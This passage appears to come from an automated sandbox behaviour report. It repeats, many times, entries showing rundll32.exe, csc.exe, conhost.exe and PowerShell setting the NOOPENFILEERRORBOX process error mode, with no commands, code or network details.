            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
